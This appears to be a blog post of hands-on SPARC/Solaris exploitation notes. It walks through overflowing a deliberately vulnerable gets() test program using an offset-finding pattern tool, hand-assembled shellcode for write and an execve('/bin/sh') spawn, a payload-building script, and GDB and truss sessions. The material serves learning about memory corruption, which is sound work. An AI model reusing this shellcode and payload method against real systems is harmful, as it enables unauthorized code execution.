Holy Mother of Pearl — SPARC Exploitation Excerpts!

SO, back to exploiting the userland gets() function.

Vulnerable Test Prog

#include <stdio.h>
unsigned long get_sp( void ) {
        __asm__("or %sp,%sp,%r1");
// %r1 may have to be %i0 in some circumstances?? weirdness..
}

void copy( ){
        char buf[256];

        gets(buf);
}

int main( ) {
        unsigned long ret = get_sp();
        fprintf (stderr, "sp = 0x%x", ret);
        copy(  );
        return 0;
}
$ gcc -g v.c -o v

This invoke scripts helps me keep the stack offset the same whether I run the program in GDB or not..
Note: it doesn’t work that well on my Sun Blade 150 but it works well at the school server…
invoke script

#!/bin/bash

while getopts "dte:h?" opt ; do
  case "$opt" in
    h|\?)
      printf "usage: %s -e KEY=VALUE prog [args...]\n" $(basename $0)
      exit 0
      ;;
    t)
      tty=1
      gdb=1
      ;;
    d)
      gdb=1
      ;;
    e)
      env=$OPTARG
      ;;
  esac
done

shift $(expr $OPTIND - 1)
prog=$(readlink -f $1)
shift
if [ -n "$gdb" ] ; then
  if [ -n "$tty" ]; then
    touch /tmp/gdb-debug-pty
    exec env - $env TERM=screen PWD=$PWD /usr/local/gnu/bin/gdb -tty /tmp/gdb-debug-pty --args $prog "$@"
  else
    exec env - $env TERM=screen PWD=$PWD /usr/local/gnu/bin/gdb --args $prog "$@"
  fi
else
  exec env - $env TERM=screen PWD=$PWD $prog "$@"
fi

I use the invoke script with absolute paths. Here’s an example:

/home/bazz/tools/tmp/latest/invoke2 v < super_payload_lol
# or i want to use gdb:
/home/bazz/tools/tmp/latest/invoke2 -d v
# then from in gdb:
# r < super_payload

Interesting note on overflowing a buffer accepted through standard input. Is that the 0x0a byte has the same effect as a null byte. That was not documented anywhere >_< 0x0a is \n iirc, I wonder if \r byte has the same effect (0x0d).. I could try it out but I’m not…

Below is my buffer overflow “marker” program source code. This is documented at https://blogs.umb.edu/michaelbazzinott001/2014/09/25/alternating-payload-automated-offset-calculation-and-identification/
with the shell code assist program, it creates a block of specified length, outputs to stdout.
you are then required to concat any arbitrary data plus the null byte (or, apparently \n)

#include <stdio.h>
#include <stdlib.h>

// SPARC uses sys/inttypes.h
#ifdef __sun
  #include <sys/inttypes.h>
#else
  #include <stdint.h>
#endif

// this form provides buffer experimentation foundation
// buffer will be created up to numbytes desired, but < MAX, specified
// on the command line argument
// form: 0x[01-ff][41-5a][41-5a][41-5a]

// 0x41-0x5a range is chars 'A' to 'Z'
// An extended range < 'A' to > 'Z' could modify this program to extend
//the MAX length of the buffer

#define CHAR_RANGE (('Z'-'A')+1)  // 'Z' - 'A' is 25, but I know
// there are 26 letters in the alphabet. I call this inclusive subtraction,
// when I add 1 to get the real desired value. There is also inclusive
// addition I think. I'm using terms I created.
// little proof program to figure this out
/*

#include

// Conclusion: Inclusive Subtraction requires add 1

int main()
{
  printf("Derp Face, I'm ready :) \n");
  printf("'Z' - 'A' = %d", ('Z'-'A')+1);

  return 0;
}

*/

#define MAX (CHAR_RANGE * 255 * 4)
// Arbitrary MAX that is derived from the following formula:
// 26a * 255b * 4c
// a [letters of the alphabet]
// b [ byte field width excluding 0 (null byte)]
// c [ 4 bytes per entry ie. 0x01414141 ]

#define RANGE (26*4)

// does the following operation to get the offset:
// [(msb - 1) * 26] + (lsb - 0x41)
unsigned long getSmashOffset(const unsigned long *smashval)
{
  uint8_t msb,lsb;

  msb = ( *smashval >> 24 ) & 0xff;
  lsb = *smashval & 0xff;

  msb--;
  msb *= 26;
  lsb -= 0x41;

  return msb+lsb;
}

int main(int argc, char **argv)
{
  char a=0x41;
  char c=1;
  int i, rc=0;

  if (argc != 2)
  {
    printf ("You're doing it wrong! \n");
    printf ("Usage: %s [numbytes <= %d]|[smashed-stack-val]\n", argv[0], MAX);     exit (1);   }   unsigned long arg, numbytes,smashval;   arg = numbytes = strtoul( argv[1], (void *)0, 0 );   if (arg > MAX)
  {
    if (arg < 0x01414141)     {       printf ("You can't have an overflow amount > %d\n", MAX);
      exit(2);
    }
    else
    {
      printf ("%lu\n", getSmashOffset(&arg));
      return 0;
    }
  }
  int tag;
  for (a=0x40,i=0,c=1,tag=1; i < (numbytes); i++)
  {
    //    if (!rc)
    if (i%4 == 0)
    {
      tag = !tag;
          printf("%c", c);
      //if (tag == 1)
      //{
        a++;
        if (a == 'Z'+1)
          a = 0x41;
      //}
    }
    else
      printf("%c",a);
    //  else printf("%c%c%c%c", a,a,a,a);
    rc ++; //+= 4;
    if (rc == RANGE)
    {
      rc=0; c++;
      if (!c)
        c++;
    }
  }
  //printf("%c",'\0');
  return 0;
}

Check it out, here’s a stupid program that uses the write syscall to write some text “Hello” to stdout.

write_raw.S

bazz@blade72[pts/3][~/nobackup/fun] cat write_raw.S
.globl main
main:
! %o1 must point to the string! let's store the string on the stack
set 0x48656c6c, %o0     !"Hell"
st %o0, [%sp+84]
set 0x6f0a0000, %o0     ! "o\n"
st %o0, [%sp+88]
add %sp, 84, %o1

mov  1, %o0
mov  7, %o2
mov  4, %g1
ta  8

! addition to prevent illegal instruction failure
mov 1, %g1  ! move 1(exit() syscall) into %g1
mov 0, %o0    ! move 0(return address) into %o0
ta 8          ! call the kernel
bazz@blade72[pts/3][~/nobackup/fun] gcc write_raw.S -o /tmp/write_ex
bazz@blade72[pts/3][~/nobackup/fun] /tmp/write_ex
Hello
bazz@blade72[pts/3][~/nobackup/fun

This gets transformed to shellcode like this:

bazz@blade72[pts/3][~/nobackup/fun/asmshell] declare -f buildsc
buildsc ()
{
    if [ "$1" = "" ]; then
        echo 'buildsc filename no extension';
        return 1;
    fi;
    as $1.S -o $1.o;
    objcopy -O binary $1.o $1.bin
}

An alternative to objcopy, also sparcv9 how to:

bazz@vm72[pts/3][~/tools/tmp] cat asmtobin.sh
as -Av9 $1.S -o $1.o
ld $1.o -o $1.bin --oformat=binary
bazz@vm72[pts/3][~/tools/tmp]
bazz@blade72[pts/3][~/nobackup/fun] buildsc write_raw
bazz@blade72[pts/3][~/nobackup/fun] od -X -A x write_raw.
write_raw.S    write_raw.bin  write_raw.o
bazz@blade72[pts/3][~/nobackup/fun] od -X -A x write_raw.bin
000000 1112195b 9012206c d023a054 111bc280
000010 d023a058 9203a054 90102001 94102007
000020 82102004 91d02008 82102001 90102000
000030 91d02008
000034

Then, to correctly put out a buffer, this knowledge comes from experimenting and debugging the target binary..

bazz@blade72[pts/1][~/tools/tmp/latest] cat build_shellcode_steps
./alternating_payload3 328  # payload size to arrive at %fp and %i7
# fp which becomes the $sp I use during our infected run. These vals
# were obtained from live debugging and a better final adaptive method should be used
# at production level.
# orig val: ffbefe78
printf "\xff\xbe\xfd\x78"
# return address:
# original val: ffbefe78
printf "\xff\xbe\xfe\xf8"
#printf "\xff\xbe\xfe\x38" >> payload
# orig val: 0x40
# experimented displacing the payload farther "up" the stack
perl -e 'print "A"x0xc0'
cat $1 # payload bin file
printf "\x00"
bazz@blade72[pts/1][~/tools/tmp/latest] ./build_shellcode_steps write_raw.bin > payload
bazz@blade72[pts/1][~/tools/tmp/latest] $PWD/invoke2 -d v
GNU gdb 5.3
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "sparc-sun-solaris2.7"...
(gdb) list 0
1       #include
2       unsigned long get_sp( void ) {
3               __asm__("or %sp,%sp,%r1");
4       }
5
6       void copy( ){
7               char buf[256];
8
9               gets(buf);
10      }
(gdb)
11
12      int main( ) {
13              unsigned long ret = get_sp();
14              fprintf (stderr, "sp = 0x%x\n", ret);
15              copy(  );
16              return 0;
17      }
(gdb) b 16
Breakpoint 1 at 0x10790: file v.c, line 16.
(gdb) r < payload
Starting program: /nobackup/blade74_sd0g/bazz/tmp/latest/v < payload
sp = 0xffbefd90

Breakpoint 1, main () at v.c:16
16              return 0;
(gdb) # overflow just happened
(gdb) x/96x $sp
# at this point, this current stack frame's %fp and %i7 are below and are the infected ones
# that will be returned upon the next ret restore.
# at the top of this printout is a continuation from my marker program,
# you can see the pattern. The beginning of the buffer could be looked at by
# going lower in memory ie. x/96x $sp-96 or farther down as well..
# but that's not necessary for us. this post is to show how the write syscalls
# are about to be executed just fine, but later the execv
# syscall just returns and I don't get a shell for some reason.
0xffbefe00:     0x03515151      0x03525252      0x03535353      0x03545454
0xffbefe10:     0x03555555      0x03565656      0x03575757      0x03585858
0xffbefe20:     0x03595959      0x035a5a5a      0x04414141      0x04424242
0xffbefe30:     0x04434343      0x04444444      0xffbefd78      0xffbefef8
0xffbefe40:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefe50:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefe60:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefe70:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefe80:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefe90:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefea0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefeb0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefec0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefed0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefee0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefef0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbeff00:     0x1112195b      0x9012206c      0xd023a054      0x111bc280
0xffbeff10:     0xd023a058      0x9203a054      0x90102001      0x94102007
0xffbeff20:     0x82102004      0x91d02008      0x82102001      0x90102000
0xffbeff30:     0x91d02008      0x00002000      0x000007d0      0x00001caf
0xffbeff40:     0x000007d1      0x00001caf      0x000007d2      0x00002801
0xffbeff50:     0x000007d3      0x00002801      0x000007d9      0x00000007
0xffbeff60:     0x00000000      0x00000000      0x2f6e6f62      0x61636b75
---Type  to continue, or q  to quit---
0xffbeff70:     0x702f626c      0x61646537      0x345f7364      0x30672f62
(gdb) si
17      }
(gdb)
0x00010798      17      }
(gdb) x/4i $pc
0x10798 <main+64>:      ret
0x1079c <main+68>:      restore
0x107a0 <main+72>:      retl
0x107a4 <main+76>:      add  %o7, %l7, %l7
(gdb) si
0x0001079c      17      }
(gdb)
0xffbeff00 in ?? ()
(gdb) x/16i $pc
0xffbeff00:     sethi  %hi(0x48656c00), %o0
0xffbeff04:     or  %o0, 0x6c, %o0      ! 0x48656c6c
0xffbeff08:     st  %o0, [ %sp + 0x54 ]
0xffbeff0c:     sethi  %hi(0x6f0a0000), %o0
0xffbeff10:     st  %o0, [ %sp + 0x58 ]
0xffbeff14:     add  %sp, 0x54, %o1
0xffbeff18:     mov  1, %o0
0xffbeff1c:     mov  7, %o2
0xffbeff20:     mov  4, %g1
0xffbeff24:     ta  8
0xffbeff28:     mov  1, %g1
0xffbeff2c:     clr  %o0
0xffbeff30:     ta  8
0xffbeff34:     unimp  0x2000
0xffbeff38:     unimp  0x7d0
0xffbeff3c:     unimp  0x1caf
(gdb) si
0xffbeff04 in ?? ()
(gdb)
0xffbeff08 in ?? ()
(gdb)
0xffbeff0c in ?? ()
(gdb)
0xffbeff10 in ?? ()
(gdb)
0xffbeff14 in ?? ()
(gdb)
0xffbeff18 in ?? ()
(gdb)
0xffbeff1c in ?? ()
(gdb)
0xffbeff20 in ?? ()
(gdb)
0xffbeff24 in ?? ()
(gdb)
Hello
0xffbeff28 in ?? ()
(gdb)
0xffbeff2c in ?? ()
(gdb)
0xffbeff30 in ?? ()
(gdb)

Program exited normally.
(gdb) del
Delete all breakpoints? (y or n) y
(gdb) r < payload
Starting program: /nobackup/blade74_sd0g/bazz/tmp/latest/v < payload
sp = 0xffbefd90
Hello

Program exited normally.
(gdb) q
bazz@blade72[pts/1][~/tools/tmp/latest] $PWD/invoke2 v < payload
sp = 0xffbefd90
Hello
bazz@blade72[pts/1][~/tools/tmp/latest]

OK I clearly demonstrated how the write example buffer overflow hijacked just fine.

But now.. a shell spawn fails, and I don’t know why:

bazz@blade72[pts/3][~/nobackup/fun/asmshell] cat asmshell3.S
.globl main
main:
set 0x2f62696e, %o0
st %o0, [%sp+84]
set 0x2f736800, %o0
st %o0, [%sp+88]
add %sp, 84, %o0
clr [%sp+92]
st %o0, [%sp+76]
clr [%sp+80]
add %sp, 76, %o1
xor %o5,%o5,%o2
mov 0x3b, %g1
ta 8
!ta 8
! addition to prevent illegal instruction failure
xor %o5,%o5,%o0
!add %o1,%o1,%o0
! interprets as end of string!! even without null byte ! and o1, 2, %o0         ! exit(0)
mov     1, %g1
ta      8

bazz@blade72[pts/3][~/nobackup/fun/asmshell] buildsc asmshell3
bazz@blade72[pts/3][~/nobackup/fun/asmshell] od -X -A x asmshell3.bin
000000 110bd89a 9012216e d023a054 110bdcda
000010 d023a058 9003a054 c023a05c d023a04c
000020 c023a050 9203a04c 941b400d 8210203b
000030 91d02008 901b400d 82102001 91d02008
000040
bazz@blade72[pts/3][~/nobackup/fun/asmshell] cp asmshell3.bin ~/tools/tmp/latest

bazz@blade72[pts/1][~/tools/tmp/latest] ./build_shellcode_steps asmshell3.bin > payload
bazz@blade72[pts/1][~/tools/tmp/latest] $PWD/invoke2 -d v
GNU gdb 5.3
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "sparc-sun-solaris2.7"...
(gdb) b 16
Breakpoint 1 at 0x10790: file v.c, line 16.
(gdb) r < payload
Starting program: /nobackup/blade74_sd0g/bazz/tmp/latest/v < payload
sp = 0xffbefd90

Breakpoint 1, main () at v.c:16
16              return 0;
(gdb) x/96x $sp
0xffbefe00:     0x03515151      0x03525252      0x03535353      0x03545454
0xffbefe10:     0x03555555      0x03565656      0x03575757      0x03585858
0xffbefe20:     0x03595959      0x035a5a5a      0x04414141      0x04424242
0xffbefe30:     0x04434343      0x04444444      0xffbefd78      0xffbefef8
0xffbefe40:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefe50:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefe60:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefe70:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefe80:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefe90:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefea0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefeb0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefec0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefed0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefee0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefef0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbeff00:     0x110bd89a      0x9012216e      0xd023a054      0x110bdcda
0xffbeff10:     0xd023a058      0x9003a054      0xc023a05c      0xd023a04c
0xffbeff20:     0xc023a050      0x9203a04c      0x941b400d      0x8210203b
0xffbeff30:     0x91d02008      0x901b400d      0x82102001      0x91d02008
0xffbeff40:     0x000007d1      0x00001caf      0x000007d2      0x00002801
0xffbeff50:     0x000007d3      0x00002801      0x000007d9      0x00000007
0xffbeff60:     0x00000000      0x00000000      0x2f6e6f62      0x61636b75
---Type <return> to continue, or q <return> to quit---
0xffbeff70:     0x702f626c      0x61646537      0x345f7364      0x30672f62
(gdb) c
Continuing.

Program received signal SIGTRAP, Trace/breakpoint trap.
0xff3b3be0 in ?? ()
(gdb) c
Continuing.

Program exited normally.
# NO SHELL!!!
(gdb) q
bazz@blade72[pts/1][~/tools/tmp/latest] $PWD/invoke2 v < payload
sp = 0xffbefd90
bazz@blade72[pts/1][~/tools/tmp/latest] #NO SHELL!!! 
bazz@blade72[pts/1][~/tools/tmp/latest] $PWD/invoke2 -d v
GNU gdb 5.3
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "sparc-sun-solaris2.7"...
(gdb) r < payload
Starting program: /nobackup/blade74_sd0g/bazz/tmp/latest/v < payload
sp = 0xffbefd90

Program received signal SIGTRAP, Trace/breakpoint trap.
0xff3b3be0 in ?? ()
(gdb) x/16i $pc
0xff3b3be0:     b,a   0xff3b3bec
0xff3b3be4:     b,a   0xff3b3bf0
0xff3b3be8:     b,a   0xff3b3bf4
0xff3b3bec:     mov  %g0, %o0
0xff3b3bf0:     save  %sp, -160, %sp
0xff3b3bf4:     call  0xff3b3bfc
0xff3b3bf8:     sethi  %hi(0x2c800), %l7
0xff3b3bfc:     or  %l7, 0x3b4, %l7     ! 0x2cbb4
0xff3b3c00:     addcc  %i0, %g0, %o0
0xff3b3c04:     bne  0xff3b3c60
0xff3b3c08:     add  %l7, %o7, %l7
0xff3b3c0c:     add  %sp, 0x60, %o0
0xff3b3c10:     mov  3, %l0
0xff3b3c14:     st  %l0, [ %o0 ]
0xff3b3c18:     add  %fp, 0x44, %l0
0xff3b3c1c:     st  %l0, [ %o0 + 4 ]
(gdb) q
The program is running.  Exit anyway? (y or n) y
bazz@blade72[pts/1][~/tools/tmp/latest]

I seem to be in some trap handler.. Maybe the mysteries as to why it’s returning and not spawning a shell lie in there….

TO BE CONTINUED

… UPDATE!!!!

-bash-4.3$ ./build_shellcode_steps asmshell5_interactive.bin
-bash-4.3$ truss $PWD/invoke2 v < payload
execve("/home/bazz/latest/invoke2", 0xFFBEFD3C, 0xFFBEFD4C)  argc = 3
resolvepath("/usr/lib/ld.so.1", "/usr/lib/ld.so.1", 1023) = 16
open("/var/ld/ld.config", O_RDONLY)             Err#2 ENOENT
stat("/usr/lib/libcurses.so.1", 0xFFBEF620)     = 0
resolvepath("/usr/lib/libcurses.so.1", "/usr/lib/libcurses.so.1", 1023) = 23
open("/usr/lib/libcurses.so.1", O_RDONLY)       = 3
mmap(0x00000000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0xFF390000
mmap(0x08F13AF8, 278528, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF340000
mmap(0xFF340000, 165416, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF340000
mmap(0xFF37A000, 28774, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 172032) = 0xFF37A000
mmap(0xFF382000, 6688, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_ANON, -1, 0) = 0xFF382000
munmap(0xFF36A000, 65536)                       = 0
memcntl(0xFF340000, 49420, MC_ADVISE, MADV_WILLNEED, 0, 0) = 0
close(3)                                        = 0
stat("/usr/lib/libsocket.so.1", 0xFFBEF620)     = 0
resolvepath("/usr/lib/libsocket.so.1", "/usr/lib/libsocket.so.1", 1023) = 23
open("/usr/lib/libsocket.so.1", O_RDONLY)       = 3
mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000
mmap(0x08F13EE0, 114688, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF320000
mmap(0xFF320000, 40558, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF320000
mmap(0xFF33A000, 4365, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 40960) = 0xFF33A000
munmap(0xFF32A000, 65536)                       = 0
memcntl(0xFF320000, 14496, MC_ADVISE, MADV_WILLNEED, 0, 0) = 0
close(3)                                        = 0
stat("/usr/lib/libnsl.so.1", 0xFFBEF620)        = 0
resolvepath("/usr/lib/libnsl.so.1", "/usr/lib/libnsl.so.1", 1023) = 20
open("/usr/lib/libnsl.so.1", O_RDONLY)          = 3
mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000
mmap(0x08F142C8, 655360, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF200000
mmap(0xFF200000, 582266, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF200000
mmap(0xFF290000, 33320, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 589824) = 0xFF290000
mmap(0xFF29A000, 23376, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_ANON, -1, 0) = 0xFF29A000
memcntl(0xFF200000, 84064, MC_ADVISE, MADV_WILLNEED, 0, 0) = 0
close(3)                                        = 0
stat("/usr/lib/libdl.so.1", 0xFFBEF620)         = 0
resolvepath("/usr/lib/libdl.so.1", "/usr/lib/libdl.so.1", 1023) = 19
open("/usr/lib/libdl.so.1", O_RDONLY)           = 3
mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000
mmap(0x08F19CA0, 8192, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF310000
mmap(0xFF310000, 2302, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF310000
mmap(0x00000000, 8192, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANON, -1, 0) = 0xFF300000
close(3)                                        = 0
stat("/usr/lib/libc.so.1", 0xFFBEF620)          = 0
resolvepath("/usr/lib/libc.so.1", "/usr/lib/libc.so.1", 1023) = 18
open("/usr/lib/libc.so.1", O_RDONLY)            = 3
mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000
mmap(0x09899EB0, 802816, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF100000
mmap(0xFF100000, 704216, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF100000
mmap(0xFF1BC000, 24772, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 704512) = 0xFF1BC000
munmap(0xFF1AC000, 65536)                       = 0
memcntl(0xFF100000, 113528, MC_ADVISE, MADV_WILLNEED, 0, 0) = 0
close(3)                                        = 0
stat("/usr/lib/libmp.so.2", 0xFFBEF620)         = 0
resolvepath("/usr/lib/libmp.so.2", "/usr/lib/libmp.so.2", 1023) = 19
open("/usr/lib/libmp.so.2", O_RDONLY)           = 3
mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000
mmap(0x09899AC8, 90112, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF2E0000
mmap(0xFF2E0000, 11316, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF2E0000
mmap(0xFF2F4000, 865, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 16384) = 0xFF2F4000
munmap(0xFF2E4000, 65536)                       = 0
memcntl(0xFF2E0000, 3124, MC_ADVISE, MADV_WILLNEED, 0, 0) = 0
close(3)                                        = 0
stat("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", 0xFFBEF338) = 0
resolvepath("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", "/usr/platform/sun4u/lib/libc_psr.so.1", 1023) = 37
open("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", O_RDONLY) = 3
mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000
mmap(0x00000000, 16384, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF2D0000
mmap(0xFF2D0000, 13800, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF2D0000
close(3)                                        = 0
munmap(0xFF390000, 8192)                        = 0
getcontext(0xFFBEFA88)
open64("/dev/tty", O_RDWR|O_NONBLOCK)           = 3
close(3)                                        = 0
brk(0x0010A060)                                 = 0
sysconfig(_CONFIG_PAGESIZE)                     = 8192
brk(0x0010A060)                                 = 0
brk(0x0010C000)                                 = 0
brk(0x0010E000)                                 = 0
getuid()                                        = 100 [100]
getgid()                                        = 10 [10]
getuid()                                        = 100 [100]
getgid()                                        = 10 [10]
getcontext(0xFFBEFA88)
time()                                          = 1413348374
brk(0x00110000)                                 = 0
brk(0x00112000)                                 = 0
sigaction(SIGCLD, 0xFFBEF9A0, 0xFFBEFA20)       = 0
sigaction(SIGCLD, 0xFFBEF9A0, 0xFFBEFA20)       = 0
sigaction(SIGINT, 0xFFBEF9A0, 0xFFBEFA20)       = 0
sigaction(SIGINT, 0xFFBEF9A0, 0xFFBEFA20)       = 0
sigaction(SIGQUIT, 0xFFBEF9A0, 0xFFBEFA20)      = 0
sigaction(SIGQUIT, 0xFFBEF9A0, 0xFFBEFA20)      = 0
sigprocmask(SIG_BLOCK, 0x00000000, 0x0010A020)  = 0
sigfillset(0xFF1C28D0)                          = 0
sigaction(SIGQUIT, 0xFFBEF9A0, 0xFFBEFA20)      = 0
uname(0xFFBEF5D8)                               = 1
stat64("/home/bazz/latest", 0xFFBEF928)         = 0
stat64(".", 0xFFBEF890)                         = 0
getpid()                                        = 2098 [2097]
getpid()                                        = 2098 [2097]
getpid()                                        = 2098 [2097]
getpgrp()                                       = 2097
sigaction(SIGCLD, 0xFFBEF9A0, 0xFFBEFA20)       = 0
sysconfig(_CONFIG_CHILD_MAX)                    = 7893
getcontext(0xFFBEFA88)
open64("/home/bazz/latest/invoke2", O_RDONLY)   = 3
ioctl(3, TCGETA, 0xFFBEFAE4)                    Err#25 ENOTTY
llseek(3, 0, SEEK_CUR)                          = 0
read(3, " # ! / b i n / b a s h\n".., 80)       = 80
llseek(3, 0, SEEK_SET)                          = 0
getrlimit(RLIMIT_NOFILE, 0xFFBEFA78)            = 0
fcntl(255, F_GETFD, 0xFFBEFAE4)                 Err#9 EBADF
fcntl(3, F_DUP2FD, 0x000000FF)                  = 255
close(3)                                        = 0
fcntl(255, F_SETFD, 0x00000001)                 = 0
fcntl(255, F_GETFL, 0x00000000)                 = 8192
fstat64(255, 0xFFBEFAD8)                        = 0
fstat64(255, 0xFFBEFB30)                        = 0
llseek(255, 0, SEEK_CUR)                        = 0
getcontext(0xFFBEFA08)
read(255, " # ! / b i n / b a s h\n".., 718)    = 718
getcontext(0xFFBEFA08)
getcontext(0xFFBEFA08)
brk(0x00114000)                                 = 0
getcontext(0xFFBEF390)
getcontext(0xFFBEFA08)
getcontext(0xFFBEFA08)
sigprocmask(SIG_BLOCK, 0x00000000, 0xFFBEF6B8)  = 0
getcontext(0xFFBEF488)
brk(0x00116000)                                 = 0
pipe()                                          = 3 [4]
sigprocmask(SIG_BLOCK, 0xFFBEF680, 0xFFBEF670)  = 0
sigprocmask(SIG_SETMASK, 0xFFBEF670, 0x00000000) = 0
sigprocmask(SIG_BLOCK, 0xFFBEF67C, 0xFFBEF66C)  = 0
llseek(255, 0xFFFFFFFFFFFFFE63, SEEK_CUR)       = 305
fork()                                          = 2099
sigprocmask(SIG_SETMASK, 0xFFBEF66C, 0x00000000) = 0
    Received signal #18, SIGCLD [caught]
      siginfo: SIGCLD CLD_EXITED pid=2099 status=0x0001
waitid(P_ALL, 0, 0xFFBEF120, WEXITED|WTRAPPED|WNOHANG) = 0
waitid(P_ALL, 0, 0xFFBEF120, WEXITED|WTRAPPED|WNOHANG) Err#10 ECHILD
setcontext(0xFFBEF350)
sigaction(SIGCLD, 0xFFBEF5D0, 0xFFBEF650)       = 0
close(4)                                        = 0
read(3, " 0\n", 128)                            = 2
read(3, 0xFFBEF710, 128)                        = 0
close(3)                                        = 0
sigprocmask(SIG_BLOCK, 0xFFBEF680, 0xFFBEF670)  = 0
sigaction(SIGINT, 0xFFBEF538, 0xFFBEF5B8)       = 0
sigaction(SIGINT, 0xFFBEF4C8, 0xFFBEF548)       = 0
sigprocmask(SIG_SETMASK, 0xFFBEF670, 0x00000000) = 0
getcontext(0xFFBEFA08)
read(255, " p r o g = $ ( / h o m e".., 718)    = 413
sigprocmask(SIG_BLOCK, 0x00000000, 0xFFBEF4D0)  = 0
getcontext(0xFFBEF2A0)
pipe()                                          = 3 [4]
sigprocmask(SIG_BLOCK, 0xFFBEF498, 0xFFBEF488)  = 0
sigprocmask(SIG_SETMASK, 0xFFBEF488, 0x00000000) = 0
sigprocmask(SIG_BLOCK, 0xFFBEF494, 0xFFBEF484)  = 0
llseek(255, 0xFFFFFFFFFFFFFE89, SEEK_CUR)       = 343
fork()                                          = 2100
sigprocmask(SIG_SETMASK, 0xFFBEF484, 0x00000000) = 0
    Received signal #18, SIGCLD [caught]
      siginfo: SIGCLD CLD_EXITED pid=2100 status=0x0000
waitid(P_ALL, 0, 0xFFBEEF38, WEXITED|WTRAPPED|WNOHANG) = 0
waitid(P_ALL, 0, 0xFFBEEF38, WEXITED|WTRAPPED|WNOHANG) Err#10 ECHILD
setcontext(0xFFBEF168)
sigaction(SIGCLD, 0xFFBEF3E8, 0xFFBEF468)       = 0
close(4)                                        = 0
read(3, " / h o m e / b a z z / l".., 128)      = 20
read(3, 0xFFBEF528, 128)                        = 0
close(3)                                        = 0
